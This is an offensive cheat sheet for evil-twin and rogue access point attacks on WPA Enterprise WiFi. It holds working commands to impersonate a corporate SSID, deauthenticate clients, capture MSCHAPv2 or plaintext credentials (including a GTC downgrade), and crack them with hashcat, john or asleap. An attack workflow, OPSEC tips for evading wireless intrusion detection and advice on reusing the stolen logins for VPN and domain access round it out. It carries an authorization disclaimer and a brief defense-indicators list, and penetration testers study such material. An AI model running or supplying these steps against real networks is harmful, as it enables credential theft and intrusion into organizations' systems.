← All cheat sheets

HOSTAPD-WPE

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Rogue access point and WPA Enterprise (802.1X/EAP) attacks.
Capture credentials from corporate WiFi networks using RADIUS
impersonation.

HOSTAPD-WPE INSTALLATION#

# Kali Linux
sudo apt install hostapd-wpe

# From source
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
cd hostapd-wpe
# Follow build instructions in README

# Generate certificates (if needed)
cd /etc/hostapd-wpe/certs
./bootstrap                                 # Generate CA + server cert

HOSTAPD-WPE CONFIGURATION#

# Config file: /etc/hostapd-wpe/hostapd-wpe.conf

# Key settings:
interface=wlan0                             # WiFi interface
ssid=CorpWiFi                              # ESSID to impersonate
channel=6                                   # Channel
hw_mode=g                                   # 2.4GHz (a for 5GHz)

# EAP settings
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
ca_cert=/etc/hostapd-wpe/certs/ca.pem
dh_file=/etc/hostapd-wpe/certs/dh

# WPA Enterprise
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
ieee8021x=1
eapol_version=2

RUNNING HOSTAPD-WPE#

# Start rogue AP
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Output shows captured credentials:
# mschapv2: username:DOMAIN\user
# challenge: XX:XX:XX:XX:XX:XX:XX:XX
# response: XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX

# Credentials logged to: /var/log/hostapd-wpe.log

# With verbose output
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf -ddd

CRACKING CAPTURED CREDENTIALS#

# MSCHAPv2 challenge/response → NTLMv1 hash
# Format for hashcat:
# username::::response:challenge

# Hashcat (NetNTLMv1)
hashcat -m 5500 captured_hash.txt wordlist.txt

# John the Ripper
john --format=netntlm captured_hash.txt --wordlist=wordlist.txt

# asleap (dedicated MSCHAPv2 cracker)
asleap -C CHALLENGE -R RESPONSE -W wordlist.txt

EAP TYPES OVERVIEW#

Type              Credential Exposure     Attack Feasibility
----              --------------------    ------------------
EAP-PEAP/MSCHAPv2 Challenge/response     High (capturable, crackable)
EAP-TTLS/PAP      Plaintext password!    High (trivial if no cert check)
EAP-TTLS/MSCHAPv2 Challenge/response     High (same as PEAP)
EAP-TLS           Client certificate     Low (mutual cert auth)
EAP-GTC           Plaintext token        Medium (one-time tokens)
EAP-FAST          PAC-based              Medium (PAC theft)
EAP-SIM/AKA       SIM-based              Low (requires SIM)

EAPHAMMER (ALTERNATIVE TOOL)#

# Modern rogue AP framework
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
sudo ./kali-setup

# Generate certs
sudo ./eaphammer --cert-wizard

# Capture credentials (evil twin)
sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --creds

# GTC downgrade attack
sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --negotiate gtc-downgrade --creds

# Hostile portal attack
sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --channel 6 --hostile-portal

# PMKID capture
sudo ./eaphammer -i wlan0 --pmkid --bssid AP_BSSID

WIFIPUMPKIN3 (ROGUE AP FRAMEWORK)#

# Modern evil twin framework
sudo apt install wifipumpkin3

# Start
sudo wifipumpkin3

# Set interface and SSID
wp3> set interface wlan0
wp3> set ssid FreeWiFi
wp3> set proxy noproxy

# Start rogue AP
wp3> start

# With captive portal
wp3> set proxy captiveflask
wp3> start

# Plugins: DNS spoof, credential capture, inject JS

ATTACK WORKFLOW#

# 1. Reconnaissance
#    Identify target WPA Enterprise network
#    Determine EAP type (airodump-ng, probe requests)
#    Note SSID, channel, BSSID

# 2. Setup rogue AP
#    Configure hostapd-wpe with target SSID
#    Generate convincing SSL certificate
#    Match channel and security settings

# 3. Force client connection
#    Deauth clients from legitimate AP
sudo aireplay-ng -0 10 -a LEGIT_AP_BSSID wlan0mon
#    Clients reconnect to rogue AP (if no cert validation)

# 4. Capture credentials
#    MSCHAPv2 challenge/response captured
#    Or plaintext (EAP-TTLS/PAP, GTC downgrade)

# 5. Crack credentials
#    hashcat -m 5500 for NetNTLMv1
#    Or use asleap for quick cracking

# 6. Use credentials
#    Connect to legitimate network
#    Or use for AD credential spraying

GTC DOWNGRADE ATTACK#

# Force clients to use EAP-GTC instead of MSCHAPv2
# EAP-GTC sends credentials in plaintext!
# Works when client doesn't validate server cert

# eaphammer
sudo ./eaphammer -i wlan0 --auth wpa-eap --essid Corp \
  --channel 6 --negotiate gtc-downgrade --creds

# Captured credentials are plaintext passwords

DEFENSE INDICATORS#

  - Rogue AP with same ESSID but different BSSID
  - Invalid/self-signed RADIUS server certificate
  - Deauthentication floods before credential capture
  - WIDS alerts for duplicate SSIDs
  - Client certificate validation prevents most attacks

OPSEC CONSIDERATIONS#

  - Use matching SSID and similar BSSID to legitimate AP
  - Generate SSL certificate mimicking real RADIUS server
  - Position rogue AP close to targets
  - Deauth sparingly to avoid WIDS detection
  - EAP-TLS networks are immune (mutual cert auth)
  - Many modern devices validate RADIUS certificates
  - Android < 11 is often vulnerable (no cert validation default)
  - iOS/macOS require explicit cert trust (harder to exploit)
  - Windows respects GPO certificate settings

TIPS#

  - EAP-TTLS/PAP gives plaintext passwords (best case)
  - GTC downgrade works against poorly configured clients
  - EAP-TLS is secure — focus on PEAP/TTLS targets
  - asleap is fastest for cracking MSCHAPv2
  - Use eaphammer for modern attacks (GTC downgrade)
  - Always deauth to force reconnection to rogue AP
  - Certificate warnings are the main defense — many users click through
  - Captured creds often work for VPN and domain login too
  - Test both 2.4GHz and 5GHz channels
  - hostapd-wpe logs all captured creds to /var/log/